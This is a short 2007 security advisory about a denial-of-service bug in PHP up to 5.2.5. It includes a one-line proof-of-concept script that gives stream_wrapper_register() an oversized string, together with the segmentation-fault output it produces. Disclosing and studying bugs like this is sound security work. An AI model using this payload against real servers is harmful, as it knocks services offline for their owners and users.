PHP <= 5.2.5 stream_wrapper_register() denial of service

Type securityvulns
Reporter Securityvulns
Modified 2007-11-14T00:00:00


Application: PHP <= 5.2.5 Web Site: Platform: unix Bug: Denial of service fonction: stream_wrapper_register() special condition: default php-memory-limit

1) Introduction 2) Bug 3) Proof of concept 4) Greets 5) Credits =========== 1) Introduction ===========

"PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML."

====== 2) Bug ======

stream_wrapper_register() is vulnerable to a denial of service

===== 3)Proof of concept =====

Proof of concept example :

<?php stream_wrapper_register("hi",str_repeat("A",8477000));//let's make sure we trigger it ! ?>

result: root@unsafebox:~/Desktop# php shot.php Erreur de segmentation (core dumped) root@unsafebox:~/Desktop#

======== 4)Greets ======== Benjilenoob, Ivanlef0u, la team soh, #futurezone, #soh

===== 5)Credits ===== laurent gaffiй